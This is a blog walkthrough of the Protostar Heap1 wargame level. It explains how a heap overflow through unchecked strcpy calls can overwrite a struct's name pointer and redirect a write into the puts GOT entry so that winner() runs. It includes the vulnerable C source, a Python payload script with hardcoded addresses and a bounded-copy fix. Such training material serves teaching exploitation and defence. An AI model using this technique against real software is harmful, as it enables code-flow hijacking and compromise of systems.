
Binary Exploitation Protostar Heap1 - Walkthrough - writeups

Hello Guyz,

Welcome again to my blog. Today I am going to share my walkthrough of the Exploit-Exercises Protostar Heap1 level.

In this level, our task is to execute the winner function through a heap overflow.

Before starting the walkthrough, let's take a look at the hints and details.

Note: I want to highlight a few points.

  • I'm not the creator of the Protostar wargame. I am just a player.
  • Here I am just providing hints and references, so that if you feel stuck anywhere you can take a look here.
  • Understand all previous levels before starting this one.
  • Do some research on assembly, C/C++ and GDB.
  • Do some research on heap overflow exploitation.

Source Code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>


struct internet {
  int priority;
  char *name;
};

void winner()
{
  printf("and we have a winner @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
  struct internet *i1, *i2, *i3;

  i1 = malloc(sizeof(struct internet));
  i1->priority = 1;
  i1->name = malloc(8);

  i2 = malloc(sizeof(struct internet));
  i2->priority = 2;
  i2->name = malloc(8);

  strcpy(i1->name, argv[1]);
  strcpy(i2->name, argv[2]);

  printf("and that's a wrap folks!\n");
}


This level takes a look at code flow hijacking in data overwrite cases.

This level is at /opt/protostar/bin/heap1

Code Review

struct internet {
  int priority;
  char *name;              /* notice that this is a pointer: it takes only 4 bytes and points to another location */
};

void winner()
{
  printf("and we have a winner @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
  struct internet *i1, *i2, *i3;       /* create three pointers to struct internet */

  i1 = malloc(sizeof(struct internet)); /* allocate space for the first struct internet */
  i1->priority = 1;                     /* store the number 1 */
  i1->name = malloc(8);                 /* allocate another 8-byte location for the char pointer */

  i2 = malloc(sizeof(struct internet)); /* allocate space for the second struct internet */
  i2->priority = 2;                     /* store the number 2 */
  i2->name = malloc(8);                 /* allocate another 8-byte location for the char pointer */

  strcpy(i1->name, argv[1]);            /* copy argv[1] to i1->name, with no length check */
  strcpy(i2->name, argv[2]);            /* copy argv[2] to i2->name, with no length check */

  printf("and that's a wrap folks!\n");
}


  Heap Overview

 | i1 ( Name, Char Pointer ) | Paddings and Other Stuff | i2 ( Name, Char Pointer ) |  Name (8) |  Name (8) |
We just need to overwrite the char pointer of i2 (i2->name). When the second strcpy copies argv[2], it reads that pointer to find out where the name is stored. Because we have changed the pointer, strcpy writes argv[2] into the GOT instead of the name buffer.
  Overflow Name And Write Data To FP


import struct

buf = "\x90"*4*5

# Address of the puts entry in the global offset table (GOT)
puts_glob = 0x08049774

# Address to overwrite the puts entry with (winner)
win = 0x08048494

ret = struct.pack("I",win)

payload = ''
payload+= buf
payload+= struct.pack("I", puts_glob)
payload+= " "
payload+= struct.pack("I",win)
print payload
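
For comparison, here is an added example (not part of the Protostar source or of this walkthrough's original code): the same struct and allocations, with the two strcpy calls replaced by a bounded copy, so an over-long argument is rejected before anything is written near i2->name. NAME_LEN, entry_new, entry_set_name and entry_free are names chosen for this sketch.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_LEN 8  /* same size as heap1's malloc(8) */

struct internet {
  int priority;
  char *name;
};

/* Allocate an entry as heap1 does, but check both allocations. */
static struct internet *entry_new(int priority)
{
  struct internet *e = malloc(sizeof(*e));
  if (e == NULL) return NULL;
  e->priority = priority;
  e->name = calloc(1, NAME_LEN);
  if (e->name == NULL) { free(e); return NULL; }
  return e;
}

/* Bounded replacement for strcpy(e->name, src): input that does not fit
   in NAME_LEN bytes including the NUL is rejected, not truncated.
   Returns 0 on success, -1 on rejection. */
static int entry_set_name(struct internet *e, const char *src)
{
  const char *nul;
  if (e == NULL || src == NULL) return -1;
  nul = memchr(src, '\0', NAME_LEN);   /* look at NAME_LEN bytes at most */
  if (nul == NULL) return -1;          /* too long: nothing is written */
  memcpy(e->name, src, (size_t)(nul - src) + 1);
  return 0;
}

static void entry_free(struct internet *e) { if (e) { free(e->name); free(e); } }

int main(int argc, char **argv)
{
  struct internet *i1 = entry_new(1), *i2 = entry_new(2);
  int ok = argc == 3 && i1 != NULL && i2 != NULL &&
           entry_set_name(i1, argv[1]) == 0 &&
           entry_set_name(i2, argv[2]) == 0;
  puts(ok ? "and that's a wrap folks!" : "usage: two names, max 7 bytes each");
  entry_free(i1);
  entry_free(i2);
  return ok ? 0 : 1;
}
```
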

For a more detailed walkthrough, check the YouTube video playlist provided below.
